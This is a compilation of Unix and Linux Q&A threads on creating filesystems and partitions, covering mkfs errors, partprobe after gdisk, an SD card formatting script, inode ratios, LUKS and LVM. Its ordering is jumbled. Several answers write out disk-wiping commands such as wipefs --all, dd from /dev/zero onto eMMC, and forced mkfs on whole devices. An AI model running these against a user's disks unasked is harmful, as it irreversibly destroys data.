Found a dos partition table in ..."/dev/sdb is a band new install of Debian 11 all kosher but somehow e2label isn't happy with it. Apart from that, I can detect no kind of trouble but what's going on with the 'superblock' issue? Is that fixable?
BTW one thing that seemed promising was:
mkfs.ext4 -L "wipeout" /dev/sda

... which added a label alright, but also wiped out everything on the disk :(
... so this is naughty?"
$ e2label /dev/sda "bad bad bad"

$ lsblk /dev/sda -o name,label,fstype,mountpoint,size,model
NAME LABEL FSTYPE MOUNTPOINT SIZE MODEL
sda bad bad bad ext4 74.5G WDC_WD800JD-75MSA3
├─sda1 d1--5-swap swap 5G
├─sda2 d2--0-boot ext4 /media/sda/2 200M
├─sda3 d3--6-root ext4 /media/sda/3 6G
├─sda4

... the command is happy to execute; the command is about LABELING a FS, not creating one. Nothing seems to have broken. I'm happy. What I want to know is why I get those 'bad magic number' messages on the other two disks.
| Bad magic number in super-block |
I was indeed missing xfsprogs, which upon installing did solve my issue.
So, first install the package:
sudo apt-get install xfsprogs

then:
sudo mkfs -t xfs -n ftype=1 /dev/sdb -f |
While working on a fresh install of debian on GCP, I am trying to format a disk to xfs.
sudo mkfs -t xfs -n ftype=1 /dev/sdb -f

which gives me this error:
mkfs: failed to execute mkfs.xfs: No such file or directory

Any thoughts? I guess I need to install something, but the error does not make it clear what to install.
| Fail to format disk, missing mkfs file. [mkfs: failed to execute mkfs.* : No such file or directory] |
The kernel is still using the old partition table.
Issue partprobe for the kernel to use the new partition table or reboot.
See man partprobe for the gory details.
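For example (the device name is whichever disk you just repartitioned):

partprobe /dev/sdb            # ask the kernel to re-read the partition table
# or, equivalently, with util-linux:
blockdev --rereadpt /dev/sdb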
EDIT (thanks to comments):
gdisk prints the following warning message informing you that the kernel is still using the old partition table, inviting you to restart:

Warning: The kernel is still using the old partition table.
The new table will be used at the next reboot.
The operation has completed successfully.

fdisk and parted (including gparted) do the partprobe automatically and inform you whether it succeeded or not.
|
I just bought two new 4TB external USB disks for backups
http://www.bestbuy.com/site/wd-my-passport-4tb-external-usb-3-0-portable-hard-drive-black/5605533.p
that came preformatted with a single large MS partition. I'm running Slackware 14.2 x64, and ran gdisk to d(elete) that partition and make three n(ew) 1.2TB partitions (just dividing the total sectors by three). Then I w(rote) the partition table info and gdisk exited. After that, both fdisk -l and gdisk -l /dev/sdb showed everything looking exactly like I'd expected.
But then mkfs -t ext4 /dev/sdb1 said it saw the original ms partition, and asked whether or not to proceed. I said no, and tried gdisk several more times, d(eleting) and re-n(ewing) all three partitions. Also tried sync, and tried unplugging the drive and re-plugging it. Nothing worked. I finally tried letting mkfs start to format the ms partition it reported, and killed it after a minute. Then re-ran gdisk yet again. And now, finally, mkfs saw the new partition table. And everything proceeded smoothly.
But what was I doing wrong? That is, how do you run gdisk so that the subsequent mkfs correctly and immediately sees the partition table you just w(rote) using gdisk? I wouldn't think that what I ended up doing is the recommended procedure.
| linux gdisk (on 4TB USB drive) followed my mkfs -- but mkfs doesn't see new partitions |
REMINDER: commands like this are designed to overwrite filesystem data. You must take extreme care to avoid targeting the wrong disk.
EDIT:
Before formatting the card, you may also want to perform a discard operation.
blkdiscard /dev/mmcblk0

This might improve performance - the same as TRIM on a SATA SSD. Resetting the block remapping layer might also theoretically help resolve corruption at or around that layer, although this method is not as good as a dedicated full device erase command (SATA secure erase). This may not be supported by all card readers. On my Dell Latitude laptop, it reset the card to all-zeros in one second. This implies that on this card it only affected the block remapping layer; it cannot have performed an immediate erase of the entire 16GB of flash.

MicroSD cards contain one or more flash chips and a small microprocessor that acts as an interface between the SD card specification and the flash chip(s). Cards are typically formatted from the factory for near-optimal performance. However, most operating systems' default partitioning and formatting utilities treat the cards like traditional hard drives. What works for traditional hard drives results in degraded performance and lifetime for flash-based cards.

http://3gfp.com/wp/2014/07/formatting-sd-cards-for-speed-and-lifetime/
A script is available for cards up to 32GiB. I have modified it to work with current versions of sfdisk. Running file -s on the resulting partition returned the same numbers as before, except for the number of heads/sectors per track. Those are not used by current operating systems, although apparently some embedded bootloaders will require specific values.
#! /bin/sh
# fdisk portion of script based on mkcard.sh v0.4
# (c) Copyright 2009 Graeme Gregory <[emailprotected]>
# Additional functionality by Steve Sakoman
# (c) Copyright 2010-2011 Steve Sakoman <[emailprotected]>
# Updated by Alan Jenkins (2016)
# Licensed under terms of GPLv2
#
# Parts of the procudure base on the work of Denys Dmytriyenko
# http://wiki.omap.com/index.php/MMC_Boot_Format

# exit if any command fails
set -e

export LC_ALL=C

format_whole_disk_fat32() {
if ! id | grep -q root; then
echo "This utility must be run prefixed with sudo or as root"
return 1
fi

local DRIVE=$1

# Make sure drive isn't mounted
# so hopefully this will fail e.g. if we're about to blow away the root filesystem
for mounted in $(findmnt -o source | grep "^$DRIVE") ; do
umount "$mounted"
done

# Make sure current partition table is deleted
wipefs --all $DRIVE

# Get disk size in bytes
local SIZE=$(fdisk -l $DRIVE | grep Disk | grep bytes | awk '{print $5}')
echo DISK SIZE – $SIZE bytes

# Note: I'm changing our default cluster size to 32KiB since all of
# our 8GiB cards are arriving with 32KiB clusters. The manufacturers
# may know something that we do not *or* they're trading speed for
# more space.
local CLUSTER_SIZE_KB=32
local CLUSTER_SIZE_IN_SECTORS=$(( $CLUSTER_SIZE_KB * 2 ))

# This won't work for drives bigger than 32GiB because
# 32GiB / 64kiB clusters = 524288 FAT entries
# 524288 FAT entries * 4 bytes / FAT = 2097152 bytes
# 2097152 bytes / 512 bytes = 4096 sectors for FAT size
# 4096 * 2 = 8192 sectors for both FAT tables which leaves no
# room for the BPB sector
if [ $SIZE -ge $(( ($CLUSTER_SIZE_KB / 2) * 1024 * 1024 * 1024 )) ]; then
echo -n "This drive is too large, >= $(($CLUSTER_SIZE_KB / 2))GiB, for this "
echo "formatting routine."
return 1
fi

# Align partitions for SD card performance/wear optimization
# Summary: start 1st partition at sector 8192 (4MiB) and align FAT32
# data to start at 8MiB (4MiB logical)
# There's a document that explains why, but its too long to
# reproduce here.
{
echo 8192,,0x0C,*
} | sfdisk -uS -q $DRIVE

sleep 1

if [ -b ${DRIVE}1 ]; then
PART1=${DRIVE}1
elif [ -b ${DRIVE}p1 ]; then
PART1=${DRIVE}p1
else
echo "Improper partitioning on $DRIVE"
return 1
fi

# Delete any old filesystem visible in new partition
wipefs --all $PART1

# Format FAT32 with 64kiB clusters (128 * 512)
# Format once to get the calculated FAT size
local FAT_SIZE=$(mkdosfs -F 32 -s $CLUSTER_SIZE_IN_SECTORS -v ${PART1} | \
    sed -n -r -e '/^FAT size is/ s,FAT size is ([0-9]+) sectors.*$,\1,p')

# Calculate the number of reserved sectors to pad in order to align
# the FAT32 data area to 4MiB
local RESERVED_SECTORS=$(( 8192 - 2 * $FAT_SIZE ))

# Format again with padding
mkdosfs -F 32 -s $CLUSTER_SIZE_IN_SECTORS -v -R $RESERVED_SECTORS ${PART1}

# Uncomment to label filesystem
#fatlabel ${PART1} BOOT
}

#set -x

format_whole_disk_fat32 "$@"
I need to reformat an SD card back to factory status.
SD card filesystem used for media has become corrupted. Accessing a certain directory causes the filesystem to be remounted readonly, and it cannot be deleted. fsck.vfat says that it does not have a repair method for the specific type of corruption.
| Reformat SD card |
Thanks to @frostschutz, his suggestion worked for.
Just for completeness I am adding that as an answer,
Using following commands did the trick for me.
wipefs -a /dev/mmcblk0p[0-9]*
wipefs -a /dev/mmcblk0First command deleted filesystem information from each partitions.
second command deleted partition table.
|
We have Beaglbone black based custom board with 256MB RAM and 4GB eMMC.
We have script to flash software on the board.
Script erases gpt partition table using following commands
#Delete primary gpt (first 17KiB)
dd if=/dev/zero of=/dev/mmcblk0 bs=1024 count=17
#Delete secondary gpt (last 17KiB)
dd if=/dev/zero of=/dev/mmcblk0 seek=3735535 bs=1024 count=17

The partitions get deleted; however, the script then re-partitions the eMMC into the same number of partitions.
After that it tries to format each partition using mkfs.ext4 (e2fsprogs version 1.42.13).
Now, while formatting a partition, mkfs.ext4 complains that the partition has a filesystem on it and that it was mounted at a particular date in the past, and asks whether it should proceed:
/dev/mmcblk0p15 contains a ext4 file system labelled 'rootfs'
last mounted on /mnt/rfs_src on Fri Feb 16 13:52:18 2018
Proceed anyway? (y,n)

This was not happening in the past; with e2fsprogs version 1.42.8 the same script used to work.
From release note of e2fsprog-1.42.13 I see that last mounted is added to some structure.
Now question is how can we remove this last mounted information from partition?
I tried wipefs -a but it has the same behavior.
One way is to zero the whole eMMC; however, that will take a lot of time.
Any suggestion/pointers ?
| How to erase gpt partition table and how to make old partition forget mount information |
It turns out that the device node needed to be created with
mknod /dev/ram1 b 1 1Once this is done, it can be formatted via e.g. mkfs.ext2:
mkfs.ext2 /dev/ram1 8192 |
I'm installing a CentOS 7 VM, and I would like to create a RAM disk inside the %pre section of a Kickstart file.
However, doing so via
mkfs -q /dev/ram1 8192

is not possible, as the mkfs binary is not present in the Kickstart environment, and all other mkfs.* filesystem-specific commands return the error "/dev/ram1: no such file or directory".
Is there any other way to do so?
| How to create a RAM disk from the Kickstart environment? |
When all else fails, use the actual sources! There, we see that the fields being printed are:
fprintf(stderr,
_("Pass completed, %u bad blocks found. (%d/%d/%d errors)\n"),
bb_count, num_read_errors, num_write_errors, num_corruption_errors);In other words, they are the number of read errors, write errors, and corruption errors.
|
I'm trying to format a supposedly defective hard disk using "mkfs.ext3 -cc /dev/sda1" on a partition that spans over the entire disk.
I wish to understand the meaning of the ongoing error report in mkfs.ext3's command output, on the last line: "...(109/0/0 errors)". I didn't find information about these three values in man pages and other sources.
This is the ongoing output of the running command:
# mkfs.ext3 -cc /dev/sda1
mke2fs 1.42.4 (12-June-2012)
Filesystem label=
OS type: Linux
Block size=4096 (log=2)
Fragment size=4096 (log=2)
Stride=0 blocks, Stripe width=0 blocks
61054976 inodes, 244190390 blocks
12209519 blocks (5.00%) reserved for the super user
First data block=0
Maximum filesystem blocks=4294967296
7453 block groups
32768 blocks per group, 32768 fragments per group
8192 inodes per group
Superblock backups saved in blocks:
32768, 98304, 163840, 229376, 294912, 819200, 884736, 1605632, 2654208,
4096000, 7962624, 11239424, 20480000, 23887872, 71663616, 78675968,
102400000, 214990848Checking with model 0xaa: done
Reading and comparision: 94.30% done, 24:09:03 elapsed. (109/0/0 errors) | Meaning of "mkfs.ext3 -cc" error report |
Use the -F option to force mkfs.ntfs to create the file system. See the mkfs.ntfs man page.
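For example, reusing the command from the question (note that this really does put the filesystem on the whole device rather than on a partition):

mkfs.ntfs -F -L "label" /dev/sdb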
|
I have an 8GB USB storage and lsblk shows it is accessible at /dev/sdb.
When trying to:
sudo mkfs.ntfs -L "label" /dev/sdb

I got:
/dev/sdb is entire device, not just one partition.
Refusing to make a filesystem here!What to do?
I'm on Ubuntu 18.04.
| Can't format USB storage at /dev/sdb |
/dev/sdb1 tells me that the drive is partitioned. You will have to repartition the drive so that the first partition is limited to 2 GB or less, and then create the FAT32 file system on this partition.
EDIT: as an alternative solution, you can tell mkdosfs to limit the file system size, instead of using the whole partition. According to the mkdosfs man page, you can specify a block count as the last parameter after the device name. I guess the block size is 512 bytes, so the number of blocks would be 2G divided by 512.
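A hedged sketch of that, following the answer's guess of 512-byte blocks (check your mkdosfs man page; some versions count 1 KiB blocks instead, in which case you would halve the number):

# limit the FAT32 filesystem to roughly 2 GB of the 16 GB partition
mkdosfs -F 32 -I /dev/sdb1 $(( 2 * 1024 * 1024 * 1024 / 512 ))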
|
I need to produce a custom live Lubuntu version on a 2GB pendrive. But don't have the pen right now, so I need to test it with the 16GB that I have at hand. The system won't start the live version if this pen is formatted to full capacity (tested on Dell and HP computers), but found that one possible solution is to format it at a smaller size. What would be the command to do so? Currently I'm using sudo mkdosfs -F 32 -I /dev/sdb1, and get the expected 14.5GB available storage.
Update: from the selected answer
$sudo fdisk /dev/sdb
> p
> n
> p
> 1
> [Intro]
> +2G
> p
> w | How to format a 16GB pendrive to store only 2GB |
OK, so in Computer Science, I'm not overly fond of saying "you can't get there from here", but in this case, you're trying to fit a square peg into a round hole.
The Sector size is usually set by the DEVICE. The 2048B sector size reported is normal for a CD/DVD drive, whereas 512B (or 520B -- which is why I said USUALLY -- some hard drives can actually switch from 512 to 520 and back).
When you ran fdisk, it clearly showed that the media sector size is 2048B. You can't easily change that, and in all likelihood, you can't change that period. You could try contacting the manufacturer of the USB drive to see if there is a tool available to reset the sector size on that device... or you could drive to the store (Walmart? Target? Staples? you name it!) and spend the $5 to $10 to buy a new USB stick.
|
I am trying hard to format a 1GB USB stick so that I can use it to install a new linux OS. Because the Disk utility has failed me when creating the file system. I tried to do it manually using fdisk by going through the following steps to create the master boot record and a 1GB partition:
# fdisk /dev/sdcCommand (m for help): p
Disk /dev/sdc: 994.5 MiB, 1042808832 bytes, 509184 sectors
Units: sectors of 1 * 2048 = 2048 bytes
Sector size (logical/physical): 2048 bytes / 2048 bytes
I/O size (minimum/optimal): 2048 bytes / 2048 bytes
Disklabel type: dos
Disk identifier: 0x967a68dbDevice Boot Start End Blocks Id System
/dev/sdc1 * 1 509183 1018366 b W95 FAT32

Command (m for help): o
Created a new DOS disklabel with disk identifier 0x727b4976.

Command (m for help): n
Partition type:
p primary (0 primary, 0 extended, 4 free)
e extended
Select (default p): p
Partition number (1-4, default 1): 1
First sector (512-509183, default 512):
Last sector, +sectors or +size{K,M,G,T,P} (512-509183, default 509183): Created a new partition 1 of type 'Linux' and of size 993.5 MiB.Command (m for help): v
Partition 1: cylinder 253 greater than maximum 252
Partition 1: previous sectors 509183 disagrees with total 507835
Remaining 511 unallocated 2048-byte sectors.Command (m for help): wThe partition table has been altered.
Calling ioctl() to re-read partition table.
Syncing disks.

Then I tried to format it to a FAT32 file system with a 512-byte sector size, but it says the minimum allowed is 2048 bytes.
# mkfs.fat -v -F 32 -S 512 /dev/sdc1
mkfs.fat 3.0.26 (2014-03-07)
Warning: sector size was set to 2048 (minimal for this device)
WARNING: Not enough clusters for a 32 bit FAT!
/dev/sdc1 has 33 heads and 61 sectors per track,
hidden sectors 0x0800;
logical sector size is 2048,
using 0xf8 media descriptor, with 508672 sectors;
drive number 0x80;
filesystem has 2 32-bit FATs and 8 sectors per cluster.
FAT size is 125 sectors, and provides 63548 clusters.
There are 32 reserved sectors.
Volume ID is 1ab3abc1, no volume label.

I need a 512-byte sector, as syslinux does not support larger sector sizes.
| How to format a 1GB USB stick to FAT32 with 512 bytes sector? |
Your free space is roughly 7.3*1024*1024*1024 bytes. On average, the size of a file is expected to be 100*1024 bytes. This means you have room for approximately
7.3*1024*1024*1024 / (100*1024) = 7.3*1024*1024/100 ≃ 76,546 distinct files. That implies you need precisely that many inodes.
The mke2fs output indicates you currently have 15,104 inodes; it's no wonder you run out of them -- you need approx. five times as many.
I believe you are missing that the -i option already directly specifies your expected average file size. You need one inode per (distinct) file, so if your avg file size is 100KB, then a new inode should be assigned to every 100KB of storage. Simply re-run the command with -i $((100*1024)).
(Your current option -i 524288 tells mke2fs that your usual file size will be 512KB, which is cca. five times larger than reality -- that's why you get cca. five times fewer inodes than needed.)
In summary, just read "bytes-per-inode" as "bytes-per-distinct-file".
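Concretely, re-running the question's own command with the bytes-per-inode ratio set to the expected average file size would look like this:

mke2fs /dev/sda2 -i $((100*1024)) -m 0 -L "SSD" -F -b 4096 -U 11111111-2222-3333-4444-555555555555 -O none,filetype,sparse_super,large_file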
|
How approximately calc bytes-per-inode for ext2?
I have 7.3GB storage (15320519 sectors 512B each). I have made ext2 filesystem with block size 4096
mke2fs /dev/sda2 -i 524288 -m 0 -L "SSD" -F -b 4096 -U 11111111-2222-3333-4444-555555555555 -O none,filetype,sparse_super,large_file

Filesystem label=SSD
OS type: Linux
Block size=4096 (log=2)
Fragment size=4096 (log=2)
15104 inodes, 1915064 blocks
0 blocks (0%) reserved for the super user
First data block=0
Maximum filesystem blocks=4194304
59 block groups
32768 blocks per group, 32768 fragments per group
256 inodes per group
Superblock backups stored on blocks:
32768, 98304, 163840, 229376, 294912, 819200, 884736, 1605632

Usually all my files have a size of about 100kB (and about 5 files can be 400MB). I tried to read this and this, but it is still not clear how to approximately calculate bytes-per-inode. The current value of 524288 is not enough: for now I can't make new files in sda2 but still have a lot of free space.
P.S. Extra info
# df -T
Filesystem Type 1K-blocks Used Available Use% Mounted on
/dev/root ext4 146929 84492 59365 59% /
devtmpfs devtmpfs 249936 0 249936 0% /dev
tmpfs tmpfs 250248 0 250248 0% /dev/shm
tmpfs tmpfs 250248 56 250192 0% /tmp
tmpfs tmpfs 250248 116 250132 0% /run
/dev/sda2 ext2 7655936 653068 7002868 9% /mnt/sda2# df -h
Filesystem Size Used Available Use% Mounted on
/dev/root 143.5M 82.5M 58.0M 59% /
devtmpfs 244.1M 0 244.1M 0% /dev
tmpfs 244.4M 0 244.4M 0% /dev/shm
tmpfs 244.4M 56.0K 244.3M 0% /tmp
tmpfs 244.4M 116.0K 244.3M 0% /run
/dev/sda2 7.3G 637.8M 6.7G 9% /mnt/sda2# fdisk -l
Disk /dev/sda: 7.45 GiB, 8001552384 bytes, 15628032 sectors
Disk model: 8GB ATA Flash Di
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x0a19a8afDevice Boot Start End Sectors Size Id Type
/dev/sda1 309 307508 307200 150M 83 Linux
/dev/sda2 307512 15628030 15320519 7.3G 83 Linux | ext2 How to choose bytes/inode ratio |
You are correct writing that the original ext2 superblock specification does not make provision for storing the file system creation date.
But leaves 788 bytes Unused starting from offset 236.
Unused meaning free for use by the programs creating/using the filesystem.
Ext4 contrarily makes provision for storing when the filesystem was created, in seconds since the epoch, s_mkfs_time, at offset 0x108 of an ext4 type superblock… that is precisely… 264 decimal.
For easing the coding of tools working more or less generally with all the ext family of filesystems, some utilities dedicated to filesystem creation might fill some of the unused 788 bytes of an ext2 superblock with ext4-like infos.
This being for example the case of the busybox mkfs_ext2 utility. cf line 522 :
STORE_LE(sb->s_mkfs_time, timestamp); |
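A hedged sketch for reading those 4 bytes directly (offset 1024 for the superblock plus 264 for s_mkfs_time, as described above; od prints in host byte order, which is little-endian on x86):

dd if=/dev/vdb bs=1 skip=$((1024 + 264)) count=4 2>/dev/null | od -An -tu4
# feed the resulting number of seconds to: date -d @<seconds>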
I am trying to find the creation date on an ext2 file system. I seem to get a current date using dumpe2fs.
The problem is that the original ext2 superblock specification does not contain such information, though it seems like there might be an extension to the original fields (something about after byte 264).

In fact, using hexdump on the superblock (hexdump -s 1024 -n 1024 -C /dev/vdb) I can find 4 bytes starting from byte 265 that contain, in little endian, the Unix time of the file system creation. Any information on how, why and under what circumstances that is there?
Thanks in advance
| Unix ext2 superblock - file system creation date |
Could be down to a bad USB cable or/and insufficient/missing external power source. Some USB ports are simply too underpowered to drive a HDD.
|
My SATA HD used as an external disk connected to a USB port is not working. When I try to format it using sudo mkfs.ext4 /dev/sdj1, I get: "Input/output error while writing out and closing file system".
In dmesg, I see
[ 3819.478357] usb 4-3: USB disconnect, device number 47
[ 3819.478535] xhci_hcd 0000:00:14.0: WARN Set TR Deq Ptr cmd failed due to incorrect slot or ep state.
[ 3819.498268] blk_update_request: I/O error, dev sdj, sector 487239680 op 0x1:(WRITE) flags 0x4000 phys_seg 256 prio class 0
[ 3819.498366] blk_update_request: I/O error, dev sdj, sector 487241728 op 0x1:(WRITE) flags 0x4000 phys_seg 256 prio class 0
[ 3819.498432] blk_update_request: I/O error, dev sdj, sector 2048 op 0x1:(WRITE) flags 0x800 phys_seg 8 prio class 0
[ 3819.498444] Buffer I/O error on dev sdj1, logical block 0, lost async page write
[ 3819.498450] Buffer I/O error on dev sdj1, logical block 1, lost async page write
[ 3819.498453] Buffer I/O error on dev sdj1, logical block 2, lost async page write
[ 3819.498455] Buffer I/O error on dev sdj1, logical block 3, lost async page write
[ 3819.498458] Buffer I/O error on dev sdj1, logical block 4, lost async page write
[ 3819.498461] Buffer I/O error on dev sdj1, logical block 5, lost async page write
[ 3819.498463] Buffer I/O error on dev sdj1, logical block 6, lost async page write
[ 3819.498466] Buffer I/O error on dev sdj1, logical block 7, lost async page write
[ 3819.498514] blk_update_request: I/O error, dev sdj, sector 487243776 op 0x1:(WRITE) flags 0x4000 phys_seg 256 prio class 0
[ 3819.500108] blk_update_request: I/O error, dev sdj, sector 2528 op 0x1:(WRITE) flags 0x4800 phys_seg 2048 prio class 0
[ 3819.500114] Buffer I/O error on dev sdj1, logical block 480, lost async page write
[ 3819.500117] Buffer I/O error on dev sdj1, logical block 481, lost async page write
[ 3819.500927] blk_update_request: I/O error, dev sdj, sector 487245824 op 0x1:(WRITE) flags 0x4000 phys_seg 256 prio class 0
[ 3819.502469] blk_update_request: I/O error, dev sdj, sector 4576 op 0x1:(WRITE) flags 0x4800 phys_seg 2048 prio class 0
[ 3819.503514] blk_update_request: I/O error, dev sdj, sector 487247872 op 0x1:(WRITE) flags 0x4000 phys_seg 256 prio class 0
[ 3819.505103] blk_update_request: I/O error, dev sdj, sector 6624 op 0x1:(WRITE) flags 0x4800 phys_seg 2048 prio class 0
[ 3819.505902] blk_update_request: I/O error, dev sdj, sector 487249920 op 0x1:(WRITE) flags 0x4000 phys_seg 256 prio class 0
[ 3819.742439] sd 9:0:0:0: [sdj] Synchronizing SCSI cache
[ 3819.742459] sd 9:0:0:0: [sdj] Synchronize Cache(10) failed: Result: hostbyte=DID_NO_CONNECT driverbyte=DRIVER_OK
[ 3820.014442] usb 4-3: new SuperSpeed USB device number 48 using xhci_hcd

How can I find out if the problem lies with the disk or with the SATA-to-USB adapter if I don't have other disks and adapters to test?
| External HDD disconnects when formating. Disk or SATA-to-USB adapter problem? |
Depending on where you're going to use that disk: there might be problems - Linux doesn't care, but other OS'es/appliances might.
Years ago I had a box for recording TV that needed an external disk to save the recordings to. The documentation for the box said that it supported using NTFS and VFAT, but the box's own software only supported making NTFS, and as NTFS wasn't well-supported on Linux in those days (it might have been read-only or something, and I wanted to be able to use the disk from Linux), I attached the disk to my Linux machine and made a VFAT filesystem on it. When I moved it back to the box, it could see the disk but not use it (it might have tried, but failed very quickly). I had a hard time figuring out what was wrong, until I for some reason got to think about partition types - and quite right: the partition was marked as containing an NTFS filesystem, but contained a VFAT filesystem (because I hadn't cared about the partition type). As soon as I had changed the partition type, the box had no problems using the disk.
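With a reasonably recent util-linux, such a mismatch can be fixed afterwards without re-creating the partition, something like this (device and partition number are purely illustrative):

# set partition 1's MBR type code to 0x0c (W95 FAT32 LBA) to match the VFAT filesystem on it
sfdisk --part-type /dev/sdc 1 c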
| What I Did

I attach an HDD; lsblk -S shows this drive as sdc
I use sudo parted /dev/sdc/ to start parted against sdc
I create a partition table as: mklabel gpt
I make a partition: mkpart my-cool-partition and,
select ext2 as my file type

According to man, this actually:

Creates a new partition, without creating a new file system on that partition
You may specify a file system type, to set the appropriate partition code in the partition table for the new partition

Therefore, I understand that Parted kindly "provisioned" or "optimized" (I hope that's the correct mindset) for me to later format the drive with ext2, for my above example.
However... then I use sudo mkfs.ntfs to format with NTFS instead of ext2. The result is:

mkntfs completed successfully. Have a nice day

I don't understand how mkpart is necessary at all. I will not lie to Parted in real life, but if I did, will there be problems?
Environment: Debian, XFCE, xfce4-terminal, Bash
| Why does Parted mkpart ask for file system type, if I can later format with another file system? [duplicate] |
Essentially what you have done by using mkfs.ntfs -F /dev/sdb or whatever against that flash disk is that you have forced upon the flash disk an ntfs partition.
The alert you are getting (and this is just my hunch here) is because you mounted it as vfat in /etc/mtab and then forced an overwrite of the file system using ntfs. Although that's just speculative.
Always unmount before making any filesystem changes to avoid that error.
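A minimal sketch of the safer sequence (the device and label here are illustrative):

umount /dev/sdb1
mkfs.ntfs -f -L mylabel /dev/sdb1   # -f is the quick/fast format from the question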
|
It occurred that I typed -F (--force) instead of -f (--fast) while running mkfs.ntfs command. The USB drive was mounted. What are possible consequences to the drive?
There's also a message "Hope /etc/mtab is incorrect". What does it mean?
| What happens if I format a mounted USB drive with --force flag? |
Unless you want to rebuild your LVM structure, you should not format any partitions. Instead, you should format the logical volumes through the device mapper. Run lsblk. You'll see something like this:
`-sda2 8:2 0 4.5G 0 part
`-VolGroup00-lvolroot 254:0 0 4.5G 0 lvm /As you can see, the mapper has made a mapped device available named VolGroup00-lvolroot. Formatting the partition that this logical volume lives on would remove the logical volume. You would end up with your root filesystem directly on the partition. It would end up looking something like this:
`-sda2 8:2 0 4.5G 0 part /The logical volumes are usually accessible in the /dev/mapper directory as symbolic links to files in /dev named dm-*. For example, the VolGroup00-lvolroot volume is accessible at /dev/mapper/VolGroup00-lvolroot. If you're making a new filesystem for your root partition, you should run something along the lines of
mkfs.ext4 /dev/mapper/VolGroup00-lvolroot |
My system currently has a volume group containing root, swap, and home logical volumes. I would like to reinstall the operating system in the root volume and format the partition in the process. I don't know how logical volumes work so I don't know if there is any information about the volume group that is stored on the root partition. If I reformat the root partition, will this remove my ability to access the volume group?
| Is it safe to reformat an lvm root partition? |
Sounds like a hardware problem. You should run badblocks in write mode on the device.
Another option would beto create a small image file (a few 100 MiB)
put a loop device upon it
create the filesystem in it
copy the image file to the (first part of the) device
compare the image file to the respective part of the device

dd if=/dev/zero of=/path/to/imagefile bs=1M count=100

losetup /dev/loop0 /path/to/imagefile

mkfs.ext4 /dev/loop0

blockdev --getsz /dev/loop0
204800

dd if=imagefile of=/dev/mapper/luks

sha1sum imagefile
aaafc117548aaebef3dbb5f4a609022e386192b6  imagefile

dd if=/dev/mapper/luks count=204800 | sha1sum
204800+0 records in
204800+0 records out
aaafc117548aaebef3dbb5f4a609022e386192b6  -
I've successfully created a LUKS drive from a 32Mb USB flash drive. However when I write an ext4 filesystem to it I am unable to mount the result, or even run fsck or dumpe2fs etc.
The drive shows up under lsblk as
sda 8:0 1 31M 0 disk
└─luks 253:0 0 15M 0 cryptI'm then writing the filesystem with sudo mkfs.ext4 -v /dev/mapper/luks, which produces
mke2fs 1.45.5 (07-Jan-2020)
fs_types for mke2fs.conf resolution: 'ext4', 'small'
Filesystem label=
OS type: Linux
Block size=4096 (log=2)
Fragment size=4096 (log=2)
Stride=0 blocks, Stripe width=0 blocks
3840 inodes, 3840 blocks
192 blocks (5.00%) reserved for the super user
First data block=0
Maximum filesystem blocks=4194304
1 block group
32768 blocks per group, 32768 fragments per group
3840 inodes per groupAllocating group tables: done
Writing inode tables: done
Creating journal (1024 blocks): done
Writing superblocks and filesystem accounting information: done

Output from various commands:
$ sudo cryptsetup luksDump /dev/sda
LUKS header information
Version: 2
Epoch: 3
Metadata area: 16384 [bytes]
Keyslots area: 16744448 [bytes]
UUID: 1f30e940-4144-4980-a32a-4f1b78a46fc5
Label: (no label)
Subsystem: (no subsystem)
Flags: (no flags)Data segments:
0: crypt
offset: 16777216 [bytes]
length: (whole device)
cipher: aes-xts-plain64
sector: 512 [bytes]Keyslots:
0: luks2
Key: 512 bits
Priority: normal
Cipher: aes-xts-plain64
Cipher key: 512 bits
PBKDF: argon2i
Time cost: 4
Memory: 187471
Threads: 4
Salt: 5c c4 28 e0 bc f6 7f df b2 1c 77 b6 fa f3 f1 bc
48 66 fc 56 e3 5c e5 13 cc af 1d 52 ec df fc 93
AF stripes: 4000
AF hash: sha256
Area offset:32768 [bytes]
Area length:258048 [bytes]
Digest ID: 0
Tokens:
Digests:
0: pbkdf2
Hash: sha256
Iterations: 18853
Salt: 62 8a b7 2c 4d 74 d3 6b 46 c2 9b 34 e2 d6 5c 3d
06 12 ee a7 5b b0 81 1f d0 99 19 b6 4f de 5c 77
Digest: c2 71 c1 d5 de 16 d9 cc 8c 15 f2 34 21 42 3a a3
24 d1 82 26 cd ab f9 98 0c 0a 68 7a 35 e2 3d a9^The Subsystem: (no subsystem) line is worrying
$ sudo mount -v /dev/mapper/luks /media/luks
mount: /media/luks: wrong fs type, bad option, bad superblock on /dev/mapper/luks, missing codepage or helper program, or other error.$ sudo fsck /dev/mapper/luks
fsck from util-linux 2.34
e2fsck 1.45.5 (07-Jan-2020)
ext2fs_open2: Bad magic number in super-block
fsck.ext2: Superblock invalid, trying backup blocks...
fsck.ext2: Bad magic number in super-block while trying to open /dev/mapper/luks
...^fsck.ext2 suggests to me that it can't tell the filesystem
$ sudo dumpe2fs /dev/mapper/luks
dumpe2fs 1.45.5 (07-Jan-2020)
dumpe2fs: Bad magic number in super-block while trying to open /dev/mapper/luks
Couldn't find valid filesystem superblock.

All of these suggest to me that the filesystem hasn't been created correctly; however, from what I can tell even a measly 15MB should be enough space, and I'm not sure what else could be the problem.
| Unable create ext4 filesystem under LUKS |
From the documentation you cited:The XFS filesystem [...] does not require any change in the default settings, either at filesystem creation time or at mount.Source: https://kafka.apache.org/documentation/#xfs
So it should just work. Also there is nothing special anymore about a 20TB device size.
Consider adding a partition table and then use /dev/sdb1 instead of /dev/sdb.
|
We need to create xfs file-system on kafka disk
The special thing about kafka disk is the disk size
kafka disk have 20TB size in our case
I not sure about the following mkfs , but I need advice to understand if the following cli , is good enough to create xfs file system on huge disk ( kafka machine )
DISK=sdb
mkfs.xfs -L kafka /dev/$DISK -f kafka best practiceFileSystem Selection
Kafka uses regular files on disk, and such it has no hard dependency on a specific file system.
We recommend EXT4 or XFS. Recent improvements to the XFS file system have shown it to have the better performance characteristics for Kafka’s workload without any compromise in stability.
Note: Do not use mounted shared drives and any network file systems. In our experience Kafka is known to have index failures on such file systems. Kafka uses MemoryMapped files to store the offset index which has known issues on a network file systems. | What is the right mkfs cli in order to create xfs file-system on huge disk |
No, not really
Unless you are operating a RAID, no special measures must be taken.
As other answers said, SSDs tend to have a block size of 4k byte instead of 512 byte. For years partition tools are aware of this, hence the partitions are aligned to 1 MiB starts. You can check with fdisk -l /dev/sdx: If the output looks like this, you are fine:
Disk /dev/sdx: xxx GiB, xxx bytes, xxx sectors
